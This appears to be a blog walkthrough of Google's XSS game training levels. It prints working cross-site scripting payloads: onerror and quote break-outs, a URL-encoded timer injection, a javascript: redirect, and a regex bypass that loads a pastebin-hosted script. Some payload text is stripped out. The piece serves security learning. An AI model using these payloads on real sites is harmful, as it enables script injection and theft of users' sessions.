Im Just going to Solving XSS game with help by Sujeet Haxor Target: https://xss-game.appspot/level1 Solution: Level 1 This is the most obvious and easiest one. Just insert following code and youre done: alert(1) Level 2 Since the script wont work youll have to think of another tags to trigger JavaScript code execution. The first thing which came in mind was to use img tags along with the onerror attributes. Here you go: Level 3 Well this time I had to read some code in order to understand the applications logic. If you toggle the code youll see index.html: [...] function chooseTab(num) { // Dynamically load the appropriate image. var html = Image + parseInt(num) + ; html += ; $(#tabContent).html(html); [...] As you see the num parameter is used to generate the img tag. The ideas was to break-out the quotes and insert some sneaky javascript code. Again Ive used the onerror attribute to insert JS. Insert this into the URL address bar and youll get your alert(): https://xss-game.appspot/level3/frame#3 onerror=alert(1); Level 4 This is quite tricky. This time I have followed the provided hints. Having the JS console activated and requesting https://xss-game.appspot/level4/frame?timer= showed me following output: SyntaxError: unterminated string literal startTimer(); Obviously there is again a way to escape the function and append the alert() call. I have tried several things: https://xss-game.appspot/level4/frame?timer=); SyntaxError: unterminated string literal startTimer()); https://xss-game.appspot/level4/frame?timer=); SyntaxError: unterminated string literal startTimer()); And then Ive decided to use some URL encoding: %3B represents the semi-colon. https://xss-game.appspot/level4/frame?timer=)%3B SyntaxError: unterminated string literal startTimer();); Aha.. There you go! We can terminate the call and insert other ones. The final request: https://xss-game.appspot/level4/frame?timer=)%3Balert(1)%3Bvar b=( which resulted in startTimer();alert(1);var b=(); I must admit: Nice one! Level 5 This one was quite easy. On the first page you can see a link: https://xss-game.appspot/level5/frame/signup?next=confirm. Now lets have a look how this next parameter is used in confirm.html: [...] setTimeout(function() { window.location = {{ next }}; }, 5000); [...] So the window.location is set based on the next parameter. This is a typical case for DOM based XSS. Besides that we have in signup.html: [...] Next >> [...] Again the next parameter is used as an a tag target. Ok, enough bla bla. Here is the PoC: Go to https://xss-game.appspot/level5/frame/signup?next=javascript:alert(1) Insert your Mail Click Next >> Level 6 This time I had to figure to host my JS code. So Ive used pastebin to host my evil code. Next I had a look at the code. As you can read a new script tag is created and the src attribute is set appropriately. The only catch about it: Youre not allowed to have a URL containing https?: [...] if (url.match(/^https?:\/\//)) { setInnerText(document.getElementById(log), Sorry, cannot load a URL containing \http\.); return; } [...] Afterwards the text after the hash is used as the scripts src: // Load this awesome gadget scriptEl.src = url; Have you noticed something about the regexp? No?! Seriously not? Ok. Its not case-sensitive. You can escape it by using hTTps or any other combination. So the final PoC: https://xss-game.appspot/level6/frame#htTps://pastebin/raw.php?i=15S5qZs0 Conclusion This was a great game to play with. After all I must say the levels were not that difficult but a really good opportunity to refresh my XSS skills :) Thanks Sujeet Haxor : https://xss-game.appspot/done
Posted on: Sat, 13 Sep 2014 09:39:42 +0000
Trending Topics
Recently Viewed Topics
© 2015